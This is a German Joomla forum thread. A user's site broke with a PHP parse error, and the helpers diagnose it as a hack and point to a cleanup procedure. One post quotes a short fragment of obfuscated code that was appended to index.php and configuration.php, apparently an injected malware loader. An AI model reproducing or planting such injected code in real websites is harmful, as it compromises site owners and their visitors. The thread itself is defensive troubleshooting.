+ Antworten
Ergebnis 1 bis 4 von 4

Thema: joomla problem

Neu an Board
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard joomla problem

Hallo!

Als ich neulich auf meine Website besuchen wollte, hatte ich folgenden Fehler:
    Parse error: syntax error, unexpected '<' in /home/.sites/716/site244/web/index.php on line 88

Ich habe aber NICHTS geändert.
    Ich hoffe irgendwer kann mir weiterhelfen.

Moderator Avatar von Lacki
    Bedankte sich
    337
    Erhielt 3.611 Danksagungen
    in 2.970 Beiträgen

Standard

Hallo.
    Leider verheißt die Meldung nichts gutes. Ist es die index.php im Hauptverzeichnis von Joomla? Möglicherweise wurdest Du gehackt. Welche Joomla Version genau ist im Einsatz, welche Erweiterungen sind in welchen Versionen installiert?

Es gibt eine empfohlene Vorgehensweise nach einem Hack, die es gilt, Schritt für Schritt abzuarbeiten. Ob Du tatsächlich gehackt worden bist, kann Dir auch evt. Dein Hoster sagen. Oder Du vergleichst die index.php auf Deinem Webspace mit der aus einem frisch heruntergeladenem Joomla. Unterschiede kannst Du hier in kurzen Ausschnitten posten, bitte aber nicht komplett.

P.S.: Übrigens freuen wir uns über Threadtitel, die das Problem kurz umschreiben, "Joomla Problem" passt so ziemlich zu jedem Thread hier im Forum und ist nicht gerade hilfreich.

3. Erhielt Danksagungen von:

Neu an Board
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard

jo tut mir leid wegen dem threadtitel.

In meiner "index.php" und "configuration.php" war in der letzten zeile ganz viel komisches zeug drangehängt. Bsp.: khg=((96<61?"kkft":"jnlz"),(52<58?"paeq":"pere"),( 1>94?"jstq":"1200"));bjg=((55<69?"cuwk":"laqf"),(2 3>54?"gpsd":",120"));bat=((29>19?"uxtp":"jpba"),(1 0>8?"ngth":"xada"));gbo=((47<31?"ialr":",116"));
    usw.

Ich habs einfach rausgelöscht und jetz gehts wieder.
    Würde aber trotzdem gerne wissen was das war :/

Gute Seele des Boards Avatar von keraM
    Bedankte sich
    152
    Erhielt 2.557 Danksagungen
    in 2.359 Beiträgen

Standard

Das war ein Hack, welcher durch das Löschen der entsprechenden Passagen nicht gelöst wurde. Die Lücke, durch welche der Eindringling kam, ist ja immer noch offen.

Lacki gab Dir einen Link. Den Punkt für Punkt abarbeiten, dann wird wieder alles gut.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

6. Erhielt Danksagungen von:

+ Antworten

Lesezeichen